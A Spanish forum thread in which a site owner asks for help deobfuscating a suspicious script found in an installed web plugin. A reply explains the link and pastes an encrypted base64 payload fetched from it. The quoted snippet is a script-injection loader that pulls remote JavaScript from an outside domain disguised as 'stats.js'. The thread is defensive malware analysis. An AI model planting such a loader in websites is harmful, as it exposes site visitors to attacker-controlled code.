[SOLUCIONADO] Ayuda a deofuscar este .js

Iniciado por RaulMarioS, Octubre 28, 2018, 10:53:02 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Octubre 28, 2018, 10:53:02 PM Ultima modificación: Octubre 29, 2018, 03:10:53 PM por blackdrake
Hola a todos, vengo a que me echeis una mano si es posible.

He encontrado este .js en el codigo de un plugin que he instalado en mi web, tiene muy mala pinta pero no logro desencriptarlo, me gustaria realmente saber el codigo real y ver que es ya que no tengo ni idea.

Gracias y un saludo.

Código:
Código: php
<script>
document.write("<script src='https:\/\/www.makelele.org\/script\/stats.js?'"+window.btoa(parseInt(Date.now()))+"><\/script>");
</script>
Octubre 29, 2018, 12:12:45 AM #1
La unica parte ofuscada en el codigo que comentaste solo tiene el link ofuscado.

Luego de haberlo desofuscada entre en ese link, me aparecio un codigo en base64, lo descodifique pero el codigo esta encriptado.

Este es el texto codificado a base64:

5wF5Nx8xbmdpUdrg4FgeRBB7kQJiQGsWd811F9yRvMgq0IG5nXkfyVnTL6bCNEy1MA2sJBjfnzFoimtGjNVSIjLupX7cBGeoggQ0R9ffJVE1h7HBVDtEWf9mchzOXNde43eWdtcXpQZGYHiTkLyh1IDdZc2X0fb4jp0xTcui2tZ1bhUv3tN4bqibDl8DBjIVJIsDVXVYrVZCcU8goVkzmDK0YTEAcmvW5Yz0VvZnqYZDT8Uh3fRqSCqRv4rIrWFwUexQKxdbwdOplIHpXyQQbgHHl9pN64j1jRR3o5fUi3kEM14KAVBMcitxsSlyXEzhwrlVwAQPEauqczbNuMzG52exVz6SeGaL7vGE5wtJHYaUxmH28hJdjXLexS7MyixGNekTLODsMNmka4nil6wE4iTCa1pJjWp7bJ0WyDolrLGBP3UaarPfJJSUKhD4d2bpMbllPKGgvnSlrMwBdlRX5JRQ0vUey6DlhYG7JnoeKgAb36NhsEfxn6nnCiCaofvGecNXzccksMvwTiOlX3TkahIMzlXYAsEPEsNeE0y7M3EGms1kwUEGcntLIqJjSo8xRWLwWkEJoipKLq4hlJYx7rjPR39Ksiije4QaouTMNixyJCQ5lODtfXj70sStKbNYfD9E72qVlYt5AjaV8OooLHvMaofUA2TPF3tN6UIrScxswHoEwN2hvy3FXjAxlum1xQPDLy5EKC7hkvVQjX8Ovctsv40RymT6dJJZhPD2sKjMgfDzcLoIXSbtWblvyeBMXlLfapiCaBpqQ203OpMMhYfeaBJJQkvOFh3QHlsRXRiOUjSIIEvZDKeNmXwci20Xk4N1qgSo8bc2u4LcJgcn1qanoHAGKBD4Gr66HYuQ9HSELEQvV3SWt3kSLVyvwcAcDGjlFNbPu4tgIkMDnEARIUKtQiZmuAz7hSsXGENbIhsqBe4ZTERCzB6pU5MoGlwYeZWVDJ6l0zMCNQCHvuj55pu0vhocDUaSU6NxQUTQtGthx5Y2zh7FGCFbT4nwZyoTFcrv6llz1PQyUPAu6IaNkPZeUnLTVaMAme6tzs3AhT8cJJHPrRCMHC0BZMuVWhwivCM54PFlJOysxfhY6ULNwLpwxUrubYNHAzMEos07gyANNRMUMxIjj7QR2hldf8VQIIv6aveq4OdSG0MtxvMQDCHFU3TacO1Uww0G1f764lYKlLdTg0JUDrzyvsJHhKBOgCvhSCnWXmHj7VcoVWizoS7TkRACBcqRPV9HxxDvTkP1g1pbYILmATfVKQxl3XdSTmzrTdWNyMOONe0LWL8xFospe0LiYYaRlKjfXg3w2SkP6kB36JBL73bm4XF3WPVhAexyuA4wsomzJXCQHdCOhNbmLQpHGkZgyxP27TzAiV92SMSz0uoiiAE4q4L7pLoXid0p6z0ouarnWjXXOmf6WUanYWunHSl05mqcVqBqA2OxlLu97Jg3ErqDoV16Nm6TJw5FWG5xIT44FyeMivQWXhzlcAr0XyUG4Zl1GryplCt0bINtdDpbUZw7AY8xx2eB1zCI1b7mNBnYkasyOSJJRfQreYZL0dn2N0LObTbZuyYPJqnxi6g9m6BB5Bm6OK9CKUrWNCViaT7TjurCBHMXOnyTYV0NF9pq4QmStiaEbiyvNZ8oGUlviUogPp4vyuVCliuOAFtMX1iL0q9HlvcDpBUf0YKztGcOZGDAm6nk7G586fQsK25aEZpEYaerRqgQ7TqtZON7uTgA863T983O7tt6EHxv7NleHMHHAvP4o5FxcIqmRuaZXD5CkD7sqtG8goPQUEVjKBQWkhibLsbJ6glrTtTkWAtdZi4UX0dHB4DVlW77piRvzdXtGRODrhQrAVlxVzewDSsYOA6eTXKsaHWRyKv01lsBhN9cmnI0gbZ5L5jF347dL35kOAlPWOrdCApZY8ZekYk63DL7HSltWqOK1aAXY2bADAzCJyQ3xa9BOVIwN3ZKuOvvY5sW8EwLf6nYFe2cpcNe7vKVzKF3yaywg1toF0aU6yTLNWXd8LrggbbQWRTu2s1itvH9vS4CrXneTlr26Sin4ue0m7vozxH32pdxhhaIexX8Tpb0iuomYCnkJTJjqqntPA17RbQ6JNfCdqCvU0RTCfem8XGzo33dD4lufbBYZQBcgeIbfz4SPjeYgUyEYBSBFe6VqHUqxvCOJkZZU3RKn6ID1hiZSbAxpGtQongVSTJCeIB8MsT9zCNAT6zLi9jHQMxf9Oa2HUFVDh4pKXzjznTsuseMCxttk1IuPTxxNcsqtwQeuqx3NqwhTK3wixZCzI6pBDWpQpQjVGxp65tUwZcpKgV2OVEoELOgoKFeavy5c6vjbZeHZq7JH3LwZqUDbITztzOD5mJhsfAEeOmdftXXxItw9nak64UzDJdI5W0ybBdqqzDF3ADAj66ttgOAlI9YsmHxjI6vjjVJTzpW92wt8DWCUKcftmeVJVt3DAyXTtHN27Jc9gFiUCVOn84RviMeeghSQQPK

Para descodificarlo puedes usar un codificador/decodificador online o puedes usar python (como lo hice yo):

print "texto".decode("base64")

te aparecera el texto pero esta encriptado. :/
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Imprimir
Ir Arriba Páginas1
Acciones del Usuario